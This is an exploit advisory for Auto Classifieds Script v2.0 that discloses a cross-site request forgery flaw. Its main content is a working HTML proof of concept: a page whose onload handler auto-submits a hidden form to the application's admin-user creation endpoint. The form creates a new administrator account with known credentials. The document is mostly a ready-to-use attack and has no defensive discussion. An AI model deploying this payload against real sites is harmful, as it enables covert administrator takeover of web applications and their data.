Auto Classifieds Script version 2.0 suffers from a cross site request forgery vulnerability.
f4f0fffe69805f55c03dd4a31592eafbfc1421a48ec87d99f775c50b1aad2ad3
Auto Classifieds Script v2.0 - CSRF Vulnerabilty [Add Admin]
====================================================================
####################################################################
.:. Author : HackXBack
.:. Contact : h-b@usa.com
.:. Home : http://www.iphobos.com/blog/
.:. Script :
http://www.phpjabbers.com/preview/auto-classifieds-script/
.:. Tested On Demo :
http://www.phpjabbers.com/demo/acl_20/index.php?controller=Admin&action=login
####################################################################
===[ Exploit ]===
Cross Site Request Forgery
===========================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://www.site.com/index.php?controller=AdminUsers&action=create">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="Full_name" value="Iphobos"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="status" value="T"/>
<input type="hidden" name="role_id" value="1"/>
</form>
</body>
</html>
####################################################################